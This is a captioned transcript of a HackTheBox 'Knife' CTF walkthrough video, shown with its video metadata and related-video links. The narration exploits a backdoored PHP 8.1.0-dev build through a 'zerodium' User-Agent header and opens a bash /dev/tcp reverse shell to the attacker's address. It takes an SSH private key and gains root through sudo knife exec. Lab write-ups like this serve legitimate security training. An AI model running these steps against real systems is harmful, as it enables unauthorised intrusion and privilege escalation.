HackTheBox - Knife

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
what's going on youtube this is ipsec we do a knife from hack to box which was a super simple easy linux box and i already know a lot of people can be disappointed about the time length of this video that being said there's gonna be a surprise video posted monday that is much longer and what i think a lot of people enjoy and i guess now that i said it it's not going to be much of a surprise but the contents are really good in that video anyways back to this machine it was pretty simple there were just two steps involved the first one is noticing the header in the http request from the server contains a weird php version if you google that you'll realize it's backdoored you um abuse the backdoor to get rce on the box and then knife is a set uid binary which is part of chef which is like a devops tool that you can use to get root on the box so with all that being said let's just jump in as always we start off with the nmap and when i'm in a rush doing ctfs i always like running a full port scan with dash dash min dash rate set to 10 000 packets per second wouldn't do this in an actual environment because it can cause some issues but um in a hack the box thing i mean it's really nice because it will do a full port scan in about 15 seconds the other flags will go over in just a minute if you don't know them by now but looks like there's just two ports open so i'm going to do a regular map with dash sc for default scripts sv enumerate versions oh eight i'll put all formats put in the nmap directory and call it knife then the ip address of 101010 to 42. and since i know the ports i want to scan i'm just going to specify dash p and do 22 and 80 and that's going to make it go a little bit quicker while that goes let's go and check out the website at 10 10 10 2 42 and it looks like some type of hospital website clicking around here i don't have anything looking at the source code try to identify if it's like wordpress joomla drupal like what is the content management system i can't really find anything it looks like just a static site there's a lot of javascript but i mean it doesn't look like it's from a content management system so the first thing i always like doing is trying like index.html to find out what the extension of the server is since it is php we know um it hurts php scripts and we can go into a go buster and uh scan with that so go buster dir you http 10 10 10 242 dash w4 list opt uh actually yeah opt set list then discovery web content then raft small words dot text dash x php so we add the php extension because we know it hosts php stuff i'm going to do go buster.out for the out file and let's take a look at the nmap scan so we do have 22 this is ssh and it is a ubuntu server then we also have um http running apache2441 and nothing really else there so we're still waiting on the go buster to finish and we can take a look at the actual request to see if there's anything else like is it giving us a cookie because cookies are also something that can uh tell us the um content like what this is and looking at the headers we see one weird thing x powered by php 8.1.0 dash dev this is a really odd tag especially seeing anything like dev on a production so i'm going to take a look at the specific version we don't really have anything else to go on while go buster is running so just googling this php string and whenever you see the first resort as exploit db you know you're in for a good time um i'm not really going to use this script because i mean i'm not going to really learn anything if i just copy and paste that i think this is a blog post so we can go look at this read the full article that's what i always like doing and i remember this story their php had a back door put in it back march 28 2021 around the time this box was released and we can see php source code targeted and backdoor attack and we can kind of take a look at this and see what it is we have if xerodium is in whatever string this is then it's going to pass it to zen eval string zend i think is like a php caching thing uh zen php cache is that what zend is uh zen cache yeah so it's passing it to some type of eval it's adding eight characters and then i don't know what it's weird to see this remove this solders are only a mid-2017 i'm sure if we read this entire post it may make sense but what it looks like it's doing is it's looking for the string the rhodium and then going plus eight characters and trying to execute it and if we look up here is it going to tell us where it is so zen find string size of http user agent so i'm guessing we put our user agent as the rhodium which is eight characters zero is four dm is four so that's eight and it goes into eight and executes an eval and there's a main difference between eval and exec eval means it's probably not going to leave the language exec means it's going to execute a system command so because it's eval we probably want to write some php code so what i'm going to do is go back to my burp suite because this is easier than just doing curl and we're going to try this out so we're going to put zorodium and then we can do echo please subscribe to see if we get output back and i'm going to search the page for please subscribe i don't see anything we can try a i think php just has sleep sleep 10 actually let's do a sleep five and that's not working let's see i'm just going to google real quick uh php sleep to see what it is it looks like it is literally just sleep yep so that didn't work the last thing we can try is like a connection back so i'm going to set a netcat open on port 80 and we're going to try a few system commands so we can do xerodium and then system curl 10 10 14 8 which is my ip address and we go back here we don't have anything so i think i'm doing something wrong maybe curl is not on the box we can try wget and this can be one of those famous moments where i just have like a typo and zorodium or something let's see the road em system it's using single quotes i'm using double quotes is that going to cause an issue see wget didn't work curl maybe it's not getting the um path user bin curl still nothing and yes i am 10 10 14 8. so this one's putting two t's in it that's looks like what it is it actually has two t's so we can try user agent with two t's and there we go we have a request back so um that was somewhat simple once we realized what that was i don't really understand this back door how like someone didn't expect it to be caught but i'm gonna try my sleep real quick so sleep one uh let's do sleep five one two three four five and we get a response back there we go um i guess i counted too fast that's 5100 milliseconds so looks like we're good let us try a reverse shell so let's go back into system we can do bash dash c let's see i'm gonna do this in single quotes double q uh double quotes and single quote bash see bash dash i dev tcp ten ten fourteen eight nine thousand one zero at and one single double nc lvmp 9001 see if we get a shell looks like we do so let's do a proper tty with python3 dash c import pty pty dot spawn then bash minus raw echo hit enter ah that didn't work oh fg enter enter i thought i typed fg but guess i didn't so let's export term to x term so now i can clear the screen and we can see what we have if we go to slash home james we can get user.txt there is a dot ssh with an idrsa and a pub so if we wanted to we could switch to a just regular shell so if i cut this dot ssh idrsa that is a big file let's copy this then go to a new window v idrsa paste chmod 600 and then sh-i james actually id rsa james at 10 10 10 2 42. you don't actually have to do this but i always find oh looks like we can't um c.s.h why can't we oh that's not authorized keys um if we just move this idrsa.pub into authorized keys then i'm guessing we can come on there we go but i always like having a regular session because who knows what's going to happen to this netcat session if i can just run a command to get back on the box i like that so we have a user.txt if we look at sudo we can run knife with sudo and knife is part of um chef so if i do man knife we can see if there's any quick wins doesn't look like we have uh manuals installed we can always try going to gtf opens and seeing if there's a quick win so gtf opens look at knife looks like there is so this is going to be one easy box so if i do pseudoknife exec id looks like we have root so we can go to slash root and get root.text so that's probably going to be the box i don't really know what else to show in this so hope you guys enjoyed the video take care and i'll see you all next week
Info
Channel: IppSec
Views: 29,593
Rating: undefined out of 5
Keywords:
Id: 93JnRTF5sQM
Channel Id: undefined
Length: 12min 15sec (735 seconds)
Published: Sat Aug 28 2021
Related Videos
HackTheBox - Backdoor
IppSec
75K
HackTheBox - Precious
IppSec
17K
STOP Learning These Programming Languages (for Beginners)
Andy Sterkowitz
662K
HackTheBox - Armageddon
IppSec
22K
GoogleCTF - Cross-Site Scripting "Pasteurize"
John Hammond
96K
HackTheBox - Mirai
IppSec
46K
PHP in 100 Seconds
Fireship
1.3M
HackTheBox - OpenSource
IppSec
18K
HackTheBox - Broker
IppSec
25K
Musk: Bombshell Presentation|馬斯克:爆炸性的演示【獨家中英文字幕完整版】
New SciTech 新科技
226K
HackTheBox - Unobtainium
IppSec
27K
HackTheBox - Forge
IppSec
24K
HackTheBox - Intelligence
IppSec
32K
HackThebox - Wifinetic
IppSec
17K
Elon Musk JUST Revealed The Last And Most TERRIFYING Secret We Are NOT Supposed To Know
Star Investing
3.3K
HackTheBox - POV
IppSec
9.3K
Exploiting Java Tomcat With a Crazy JSP Web Shell - Real World CTF 2022
LiveOverflow
88K
DHH - Ruby on Rails, 37signals, and the future of web development
devtools-fm
21K
PHP in 60 Seconds: The Basics #php #project #technology
Dave Hollingworth
377K
HackTheBox - Remote
IppSec
40K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.